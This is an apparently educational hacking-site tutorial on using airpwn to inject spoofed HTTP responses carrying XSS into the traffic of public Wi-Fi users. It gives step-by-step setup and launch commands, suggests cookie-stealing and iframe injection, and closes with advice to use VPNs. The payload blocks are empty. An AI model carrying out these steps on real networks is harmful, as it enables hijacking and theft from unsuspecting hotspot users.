Intro

If I asked how many of you have ever used a public hotspot, whether at the airport, a coffee shop, a store, or anywhere else, the vast majority of you would probably answer yes. Of course, we all know how unsafe these public wireless networks can be; so we know better than to read our email, enter our passwords, or give out any sensitive information. However, many people (even the most informed) still believe that casual surfing of the net on a public network is perfectly fine. Usually, they would respond with:

“If I’m not looking at something private, who cares if someone’s watching?”

The reality is that packet sniffing is no longer the only threat to public network users, packing injection tools like airpwn can make even casual browsing incredibly dangerous.

In this article, I will show you how airpwn can generate spoofed packets containing XSS payloads and what you could potentially do with them. Hopefully, this article will give you some insight on the huge dangers of using unencrypted public hotspots and will convince you to try and avoid them.


Disclaimer

I wrote this article purely as an education illustration of what airpwn can do to users of an unencrypted public wireless network. Neither I, nor HackThisSite, shall be held responsible for any damages you cause based on the information in this article.


How Airpwn Works

Airpwn is a packet injection tool that monitors 802.11a/b/g networks and scans for outgoing request packets from a victim’s computer. It uses a regex-based configurable filtering engine to find ‘matching’ request packets. Once it locates ‘matching’ request packets, airpwn can inject spoofed reply packets back to the victim’s computer carrying the correct IP address and MAC address of the requested resource as well as any specified payload. Since the attacker’s spoofed packets arrive faster than the packets from the requested resource (airpwn can respond in less than 1ms, average internet latency is about 50ms), the victim’s computer will accept the injected packets and treat them as valid. When the real packets from the requested resource finally arrive, they will either by dropped (if the requested packet is shorter than the spoofed) or appended to the spoofed packets (if the requested packet is longer than the spoofed).

With that said, the attacker could easily inject replacement pictures, HTML, client side scripting languages like Javascript, or any other XSS payload into the forged packets. This is where XSS and wireless network attacks cross paths, and as a result, XSS is given an entirely new meaning; each and every website visited suddenly becomes XSS vulnerable.




Backtrack 2

Backtrack 2 is an excellent Slackware LiveCD that comes bundled with a variety of useful tools and software for security and penetration testing. Airpwn, the packet injection tool we will be using, is included on this LiveCD. You can get Backtrack 2 from http://www.remote-exploit.com. Once you have downloaded it, burn the Backtrack 2 image to a CD and boot from it. Depending on your computer, you may have to change your boot order. Once the LiveCD boots, you can use the username root and the password toor to login.


The Attack

1. Go to the root directory of the airpwn program. On Backtrack 2, you can do this by running the command: cd /pentest/wireless/airpwn-*

2. Go the configuration directory by running: cd conf

3. Start up your favourite text editor (I prefer nano) and create a new file named xss_attack. In this file, type:

CODE :


This is the configuration we will specify for airpwn’s internal filtering engine. The second line is a regular expression for the packets that will be accepted by airpwn. The third line is another regular expression for the packets that will be ignored by airpwn. The last line specifies the content file that will be injected into each spoofed packet.

4. Go back to the root directory of the airpwn program by running: cd ..

5. Go to the content folder by running: cd content

6. Start up your favourite text editor again and create another new file named xss_content. In this file, type:

CODE :


This file specifies the content that will be injected into each spoofed packet. It contains the headers that would have been sent back by a web server and the HTML to inject. In the above example, each page visited by the victim would result in a Javascript alert and the rest of the code (if appended from the real packet) being commented out.

7. Go back to the root directory of the airpwn program by running: cd ..

8. Run: ./madwifing_prep.sh to set up your 802.11a/b/g wireless network card.

9. Find the name of your wireless interface by running: iwconfig

10. Set the channel of your wireless card to the channel of the target wireless network. For example, if my wireless interface was ath0 and the channel of my target wireless network was 13, I would run: iwconfig ath0 channel 13

11. Enable your wireless interface by running: ifconfig ath0 up

12. Finally, start up airpwn by running: airpwn –c conf/xss_attack –i ath0 –d madwifi –vvv

The –c flag specifies the configuration file, the –i flag specifies the wireless interface, the –d flag specifies the driver (which should be madwifi if you used the madwifing_prep shell script), and the –vvv flag specifies verbosity.


Potential Attacks

Once you can successfully inject arbitrary content to your target wireless networks, your capabilities become endless. You could insert invisible/visible IFRAMEs, cookie stealing code, history scanners, or ANY other XSS code you wish.

“With airpwn, you *are* the network…You are every web server out there” – Source: Airpwn Readme


Preventing These Attacks

The only real way to prevent against this type of attacks is to avoid unencrypted public wireless networks! If you absolutely must use a public network, ensure that ALL HTTP traffic goes over an encrypted tunnel (e.g. VPN, encrypted proxies).


Happy Hacking!